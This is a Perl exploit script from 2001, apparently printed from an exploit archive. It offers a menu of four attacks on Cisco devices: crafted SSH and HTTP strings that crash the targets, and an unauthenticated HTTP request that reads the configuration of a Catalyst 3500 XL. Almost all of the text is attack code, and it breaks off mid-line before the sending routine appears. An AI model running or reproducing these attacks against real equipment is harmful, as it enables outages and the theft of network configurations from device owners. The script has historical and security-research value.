1 #!/usr/bin/perl
2 #
3 # Written by hypoclear − http://hypoclear.cjb.net
4 # Thong−th−thong−th−thong.pl AKA thong.pl is a PERL script
5 # which automates several attacks against various Cisco products.
6 # To be specific:
7 #
8 # 12−13−00 − Cisco Catalyst ssh Protocol Mismatch DoS Vulnerability
9 # 11−28−00 − Cisco 675 Web Administration Denial of Service Vulnerability
10 # 10−26−00 − Cisco Catalyst 3500 XL Remote Arbitrary Command
11 # 10−25−00 − Cisco IOS Software HTTP Request DoS Vulnerability
12 #
13 # usage: ./thong.pl −h <host>
14
15 use IO::Socket; use Getopt::Std;
16 getopts(’h:’);
17
18 if (defined $opt_h)
19 {
20 $HOST = $opt_h;
21 $PORT;
22 $STRING = "";
23 $menu_opt = "";
24
25 menu();
26 computeOption();
27 exploit();
28 }
29
30 else {print "\n\n usage ./thong.pl −h <host>\n\n"}
31
32 sub menu
33 {
34 print "\n\n DATE VULNERABILITY
35
1. 12−13−00 − Cisco Catalyst ssh Protocol Mismatch DoS Vulnerability
36
2. 11−28−00 − Cisco 675 Web Administration Denial of Service Vulnerability
37
3. 10−26−00 − Cisco Catalyst 3500 XL Remote Arbitrary Command
38
4. 10−25−00 − Cisco IOS Software HTTP Request DoS Vulnerability
39
40
Enter Option: ";
41 $menu_opt = <STDIN>;
42 chomp ($menu_opt);
43 }
44
45 sub computeOption
46 {
47 if ($menu_opt == "1"){$PORT = 22; $STRING = "this ain’t SSH";}
48 elsif ($menu_opt == "2"){$PORT = 80; $STRING = "GET ? HTTP/1.0\n\n";}
49 elsif ($menu_opt == "3"){$PORT = 80; three();}
50 elsif ($menu_opt == "4"){$PORT = 80; $STRING = "GET /error?/ HTTP/1.0\n\n";}
51 else {print "Select a real option!\n"; menu();}
52 }
Page 1/2
Cisco Multiple Products Automated Exploit Tool
hypoclear
01/27/2001
53
54 sub three
55 {
56 print "Enter file to read or enter D for default (/show/config/cr): ";
57 $key = <STDIN>;
58 chomp ($key);
59 print "\nGetting $key...";
60
61 if (($key eq "D")||($key eq "d"))
62 {
63 print "\nGetting /show/config/cr...\n";
64 $STRING = "GET /exec/show/config/cr HTTP/1.0\n\n";
65 }
66 e